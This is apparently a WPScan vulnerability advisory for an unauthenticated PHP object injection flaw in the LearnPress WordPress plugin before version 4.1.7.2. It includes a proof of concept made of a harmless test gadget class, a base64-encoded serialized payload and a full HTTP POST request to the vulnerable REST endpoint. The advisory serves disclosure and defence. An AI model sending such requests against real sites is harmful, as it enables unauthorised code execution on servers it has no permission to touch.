WordPress Plugin Vulnerabilities
LearnPress < 4.1.7.2 - Unauthenticated PHP Object Injection via REST API
Description
The plugin unserialises user input in a REST API endpoint available to unauthenticated users, which could lead to PHP Object Injection when a suitable gadget is present, leadint to remote code execution (RCE). To successfully exploit this vulnerability attackers must have knowledge of the site secrets, allowing them to generate a valid hash via the wp_hash() function.
Proof of Concept
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
payload: {"widget":"learnpress_widget_course_extra","instance":"Tzo0OiJFdmlsIjowOnt9Ow==","hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"}
- instance is base64 encode of serialized object: O:4:"Evil":0:{};
- hash is caculated by: wp_hash(base64_decode($instance ))
POST /wp-json/lp/v1/widgets/api?_locale=user HTTP/1.1
Content-Type: application/json
Content-Length: 123
{"widget":"learnpress_widget_course_extra","instance":"Tzo0OiJFdmlsIjowOnt9Ow==","hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"}
Affects Plugins
Fixed in 4.1.7.2 References
CVE
Classification
Type
OBJECT INJECTION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Nguyen Duy Quoc Khanh
Submitter
Nguyen Duy Quoc Khanh
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-10-05 (about 1 years ago)
Added
2022-10-05 (about 1 years ago)
Last Updated
2022-10-05 (about 1 years ago)
WPScan 